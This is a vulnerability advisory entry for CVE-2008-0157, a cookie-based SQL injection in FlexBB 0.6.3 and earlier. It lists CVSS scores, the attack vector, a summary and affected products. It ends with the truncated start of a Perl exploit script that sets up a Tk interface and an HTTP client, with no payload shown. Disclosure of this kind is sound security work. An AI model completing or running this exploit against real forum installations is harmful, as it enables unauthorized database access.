7.5
CVSSv2

CVE-2008-0157

Published: 09/01/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in FlexBB 0.6.3 and previous versions allows remote malicious users to execute arbitrary SQL commands via the flexbb_temp_id parameter in a cookie.

Vulnerable Product Search on Vulmon Subscribe to Product

flexbb flexbb 1.0_10005_beta_release_1

flexbb flexbb

Exploits

#!/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "UnderWHAT?!" ); $mw->geometry ( '420x343' ) ; $mw->resizable(0,0); $mw->Label(-text => '', -font => '{Verdana} 8',-foreground=>'red')->pack(); $mw->Label(-text => 'FlexBB <= 063 Cookies S ...